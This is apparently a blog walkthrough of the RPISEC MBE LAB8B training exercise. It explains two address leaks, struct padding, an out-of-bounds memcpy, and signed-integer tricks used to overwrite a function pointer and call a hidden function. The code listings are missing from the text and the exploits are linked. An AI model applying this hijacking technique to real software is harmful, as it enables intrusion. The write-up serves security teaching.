Out-of-bounds read-write with some integer sign flipping - MBE LAB8B walkthrough - the basic version
I decided to skip the LAB8C (https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8C.c) writeup, as solving it did not even require running gdb - so I was like "muh".
Instead, let's look at LAB8B.
The target app
As usual, here's the source code: https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8B.c.
Compilation flags
Below are the compilation flags from the comment at the top of the source file:
However, these flags do not seem to add up with the actual compilation flags used to produce the /levels/lab08/lab8B
binary. My conclusion is that -fPIE -pie
flags were NOT used when compiling, as the addresses in the code segment turned out to be fixed (but that's OK, we can leak mem from the program, having them ASLR-ed would not really make things much more difficult here). Plus, there' s a second (bonus) solution to this, which does not utilize those fixed addresses, but later on that. Also, this commit https://github.com/RPISEC/MBE/commit/ad0d378e379470ebf744655234361bd303530ab4 suggests some comment flags vs real compilation flags discrepancies in chapter 8's labs.
The code
Below is the data structure we are going to work on:
The core logic of the program is to allow us enterData()
into v1
and v2
structures (just the numbers and the char, the printFunc
pointer is initialized with a fixed value).
We can't manually enter data into the v3
vector. Instead, v3
is filled by adding the values of the corresponding v1
and v2
fields together (sumVectors()
). For this to happen, neither of the v1
and v2
fields can be 0
:
enterData()
simply fills a vector
structure with user-supplied numbers plus the vector.a
char
, using scanf()
calls with format strings relevant to their declared types (signed/unsigned). The vector.a
char
is an exception to this, as it is read from stdin
with a getchar()
call:
This is our user interface:
And this is how our user interface is connected to methods:
Now, the most important method:
How v.printFunc pointers are initialized + what does printVector() do
By default all printFunc
pointers point at printf()
:
When enterData()
is called, v.printFunc
is overwritten with printVector()
address:
This means that asking the program to print a vector before we even enter it would make it call printf()
on an yet empty vector. The only initialized field would be the printFunc
, containing the current libc printf()
address. So yeah, this is the first vulnerability, but it's not the only leak in this app.
The second leak is a feature of the program itself, implemented in the printVector()
function:
So we can leak printVector()
address, libc printf()
address as well as the address of the v
vector in the data segment.
The following simple exploit skeleton extracts both of the leaks:
https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_leak.py
The out-of-bounds-read-write
So, this is the vulnerability we are after:
We can allocate and copy up to MAX_FAVS
(10
) versions of v3
(can be the same v3
without making any changes to it) to the faves[]
array.
The first fave (faves[0]
) is a proper byte-to-byte copy of v3
, because i
is 0
at the time. The issue starts to manifest itself as i
grows. So, a careful pick of the sum constituents (relevant corresponding v1
and v2
fields) along with the right choice of an i
value from within the 0-9
range should allow us to arbitrarily overwrite the printFunc
pointer in at least one of the faves. Then load it back to either v1
or v2
and task the program to print it.
But before we get ahead of ourselves, let's clarify few basic things first.
Sizes and paddings - how data is aligned in memory
In this case it seems like a good idea to start with checking the size of the struct vector
structure, as well as its individual members. We also need to expect some padding (we're in 32-bit world here, so eventual space reserved for an object will be rounded to a multiply of 4).
Over the course of my work on this challenge, I compiled a few small C programs to test some stuff the easy way, here's one of them:
The output:
So we know that in our system (MBE VM) both int
and long int
have the same size. We also know the entire size of the struct vector
= 44
.
Since both longs take 8+8 (16), four integers take 4+4+4+4 (16), that's already 32. We also know that the printFunc
pointer will take 4 bytes, making it 36. So, we have 8 more bytes occupied by two short integers and one char. This makes sense as short integers are two-byte variables, so 4 bytes are needed to contain two of them (making it all 40 so far). A single char takes only one byte (making it 41), so three more bytes of padding are required attain the nearest multiply of 4 (44).
But let's see how this actually looks like in memory. For this purpose, I created a skeleton of the exploit, simply filling the particular structure fields with a set of values making them easy to distinguish:
The text version is here: https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_init_bare.py
A note about libc output buffering
When using pwnlib (pwntools), I highly recommend the additional stdin=PTY
argument for the process()
call (can save you a lot of frustration, whereas the output you expect from the target app does not arrive and you have the impression that the program hung). This particular challenge made me learn the hard way that by default pwnlib is using a pipe (not a PTY) as the standard input for our exploit. This means that the target application does not recognize its standard output as an active device (PTY), which would prevent libc from buffering data coming from its output routines like printf()
. Some more details here: https://twitter.com/julianpentest/status/1143386259164938240.
Anyway, back to our memory alignment inspection. Running it (you might want to cp /levels/lab08/lab8B /tmp
first):
Second console (for this, /proc/sys/kernel/yama/ptrace_scope
needs to be set to 0
- I keep it this way on MBE VM as it's efficient):
And here's the v1
contents after enterData()
(easy to attach and see when the program is waiting for input here, no breakpoints needed):
A slightly closer look:
Adding vectors
OK, now let's get two vectors summed, while trying to pick the v1
and v2
fields in such a way that we get expected values in v3
fields.
So, let's say we want our v3
sum to consist of consecutive capital letters, 'A','B','C' and so on.
This will make it easy to distinguish which bytes of the v3
vector are being copied to which bytes of the particular faves[i]
structure, as the i
offset grows.
As our v3
has to come from a sum of non-zero values, we will simply fill the first vector with growing natural numbers, starting at 0x1
, while filling all the fields in the second vector with 0x40
-s.
We can achieve 0x40
in particular memory cells by putting the following values in, depending on the type:
And here we go (again, full text version can be found here https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_test_sum.py):
And here we have it:
Due to our v1
values being very small (0x1
), the more-significant bytes of those values were nulls, producing 0x40
(no change) in v3
when summed with the more-significant bytes of their v2
counterparts. Fair enough, now we have a basic understanding how to manipulate v3
and therefore faves[i]
.
Options for execution control
Now, the best way to see our options here is to simply use the v3
contents we already have and add it to favorites 10 times or less (as we can't do more) and examine the resulting faves[i].printFunc
pointer. Once we identify and pick the most favorable offset (the value of i
that allows us to fully control the pointer with any of the v3
fields), we'll pick the proper v1
and v2
values once again so their sum is what we want and exploit it. Having the proper i
we know how many times our v3
has to be added to favorites and as well what is the favorite number we want to ask the program to print for us to execute code from our arbitrarily provided address.
I initially though that i
increments by 1
in the vulnerable memcpy()
call will result in the pointer address being incremented by one byte as well.
Debugging, however, revealed that the expression is expanded with the variable type being a pointer to int (which is 4 bytes), hence consecutive increments of i
will make the memcpy()
source argument point at further and further whole dwords (double words, 4-byte chunks) of the current v3
contents.
Here's how faves[]
change with every single fave()
call:
So, for i
=0
, faves[0]
is a complete copy of v3
.
Now, after a second fave()
call, i=1
:
Yes, the second fave already has its printFunc
pointer fully overwritten with data from our input (0x40420041
)! So with every new favorite added the byte offset of the out-of-bound-read-write will effectively move by 4
.
As we can see, i=1
is not sufficient for our desired pointer overwrite, because we cannot control the nullbyte (as opposed to every other byte) in the 0x40420041
value (that nullbyte comes from the char v3.a
padding - beyond our control). The whole value contains v3.a
with padding (two least significant bytes) and short int v3.b
(two most significant bytes).
The next offset (i=2
, faves[2]
) is even worse, as we would have the unsigned short int v3.c
being our new pointer (0x00004043
at the time of taking the above screenshot), which in turn has two padding nullbytes we cannot control:
Offset i=3
does the trick (gives us full control over the pointer).
One more thing. We can't ask the program to directly call any of the faves[i].printFunc
. Instead, we must load the particular favorite into one of the two work vectors (v1
or v2
), then print it.
And:
It looks like we're almost there.
The basic solution (without bonus points)
There's one more important code section I did not mention:
Long story short, the basic solution is to now pick our input in such a way that instead of 0x40404044
, faves[3].printFunc
contains the address of thisIsASecret()
.
Normally we would calculate the thisIsASecret()
function's address based on the already leaked printVector()
address:
But due to the missing -fPIE -pie
flags this is not required. The address is simply 0x800010a7
.
The problem with signs
Knowing that 0x800010a7
is 2147487911
in decimal, I simply tried to split it between v1.d
and v2.d
values as 2147487910
and 1
.
This did not work, because d
is a signed integer, with possible value range of -2147483648 <--> 2147483647
. 2147487911
is slightly above the range. When provided to scanf("%d", &(v->d));
, it ends up truncated to the maximum value of 0x7fffffff
to avoid integer overflow.
0x7fffffff
is 2147483647
, while 0x80000000
is -2147483648
. This means that our desired pointer is a negative number and we cannot achieve int overflows with scanf()
.
The arithmetic overflow, however, is entirely feasible when the values get added in the sumVectors()
function. So v1.d
= 2147487911
ending up as 0x7fffffff
, summed with 0x1
made the value 0x80000000
. Quite close, but not what we want.
There are several solutions to this:
- stick to the values we already picked and just overflow the sum even more by setting
v2.d
to the0x10a7
offset +1
, sov1.d=0x7fffffff
+v2.d = 0x10a7 + 1
becomes0x800010a7
or just pick some two static numbers that lead to the result we want (the simple and ugly solution, not to mention lazy as well) - dynamically leak the target value as a signed integer, using pwnlibs unpacking functions (e.g.
number = u32(leak[0x0:0x4],sign="signed")
) to get the value of the pointer interpreted as a signed integer, use if onv1.d
input while putting the required calculation offset (e.g. difference betweenprintVector()
andthisIsASecret()
or difference betweensystem()
andprintf()
) asv2.d
, flipping the signs if needed - depending on whether the initial value is negative - dynamically leak and calculate the target value treating it as unsigned, then split it into half (e.g. for target
2147487911
that would be1073743955
and1073743956
forv1.d
andv2.d
inputs, respectively), so both inputs are within the signed int range forscanf()
and still good for the overflow (smart, reliable and quite easy solution) - simply use the next offset
i=4
instead ofi=3
, becausev.e
is an unsigned integer, so we get rid of the problem entirely (lazy and neat solution)
Thus, overflowing it even more with a statically picked values could go like this:
Knowing that:
-
0x80000000
is-2147483648
(the bottom of the unsigned int range) 0x8000010a7
isthisIsASecret()
address0x10a7
isthisIsASecret()
offset (4263
decimal)
we can pick 4263
and -2147483648
as v1.d
, v2.d
:
The full exploit code (basic non-bonus version)
https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8B/exploit_working_simple_and_ugly.py
The bonus version will follow in the second part.